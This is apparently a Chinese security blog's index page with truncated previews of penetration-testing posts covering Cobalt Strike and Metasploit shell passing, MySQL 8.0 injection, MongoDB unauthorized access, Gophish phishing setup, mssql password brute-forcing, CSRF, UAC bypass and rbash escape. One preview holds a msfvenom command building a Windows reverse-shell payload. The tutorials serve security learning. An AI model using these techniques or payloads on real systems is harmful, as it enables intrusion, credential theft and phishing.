Live My Life

Keep moving

CS与MSF联动

CS与MSF联动 NAT模式 CS : 192.168.120.67 MSF : 192.168.120.68 victim : 192.168.120.71 CS to MSF 利用CS的beacon给MSF派生一个shell MSF 按如下配置 12345678910111213msf6 > use exploit/multi/handler [*] Using confi......

MySQL8.0注入新特性

MySQL8.0注入新特性TABLE StatementTABLE是MySQL 8.0.19中引入的DML语句,它返回命名表的行和列,类似于SELECT,并且支持UNION联合查询、ORDER BY排序、LIMIT子句限制产生的行数 1TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]] 与SELE......

常见未授权访问漏洞

未授权访问漏洞MongoDB未授权访问漏洞漏洞成因MongoDB服务默认未开启权限验证,若启动mongodb服务时,未设置--auth参数(添加账号密码),则攻击者无需密码(默认空口令)可直接操作数据库,默认端口27017 漏洞复现 使用高交互shell连接mongodb 执行show dbs命令,无报错信息,列表存在默认库local库,则判断存在未授权访问(local库即便删除,重启mo......

初探邮件钓鱼

邮件钓鱼平台搭建及使用准备环境和工具 两台vps 可用域名 钓鱼平台 环境搭建 Gophish搭建 使用docker从源码搭建 查看官方文档Dockerfile,需要暴露三个端口 123docker pull gophish/gophish:latestdocker run -it -d -p 3333:3333 -p 8080:8080 -p 8443:8443 gophish/go......

内网渗透(一)

环境预设环境:攻击机Kali已通过代理进入内网 探测活动主机 使用netdiscover或nmap扫描主机 Kali自带的netdiscover是专用的二层发现工具,拥有主动和被动发现两种方式。 -i 指定网卡 -r 指定扫描范围 探测主机开放的端口和服务 攻击服务 mssql口令爆破 使用msfconsole的mssql_login模块爆破弱口令 爆破出弱口令 sa:a......

CSRF攻击技术浅析

CSRF攻击技术浅析CSRF(Cross-site request forgery)跨站请求伪造,由客户端发起,是一种劫持受信任用户向服务器发送非预期请求的攻击方式,与XSS相似,但比XSS更难防范,常与XSS一起配合攻击 原理详解攻击者盗用了你的身份信息,以你的名义发送恶意请求,对服务器来说这个请求是你发起的,却完成了攻击者所期望的一个操作 漏洞危害修改用户信息,修改密码,以你的名义发送......

搭建个人CTF动态靶场

前言根据网上的教程,用CTFd配合ctf-whale插件搭建一个动态靶机,有些踩坑的地方记录下来 官方教程https://www.zhaoj.in/read-6333.html 搭建环境 ubuntu18.04 docker19.03.12 docker-compose1.26.2 搭建步骤一、安装docker 方法一:使用官方脚本自动安装 1curl -fsSL https://......

绕过uac提权

绕过uac提权比较简单,做个步骤记录 1. 生成exe远控文件1234567msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.2.128 LPORT=4444 -b "\x00" -e x86/shikat......

IIS短文件名猜解

前提 IIS ASP.NET 短文件规则 只保留前六位,后续用~1表示 全部为大写 后缀最多显示三位,其余被截断 长文件名前缀或文件夹名字符长度符合0-9和Aa-Zz范围且需要大于等于9位才会生成短文件名,如果包含空格或者其他部分特殊字符,不论长度均会生成短文件 漏洞原理为了兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3 短文件......

rbash绕过

什么是rbash?先解释下什么是bash,bash是shell的一种,一种壳层与命令行界面,是Unix操作系统下传统的用户和计算机的交互界面。而rbash中,r for restricted,意思是受限制的bash,即该bash被管理员限制了部分命令,如whoami,su,cat等常用命令不能使用,从而降低被入侵的可能 rbash绕过即使受到了限制,也有方法绕过。通常是利用系统内的软件执行外......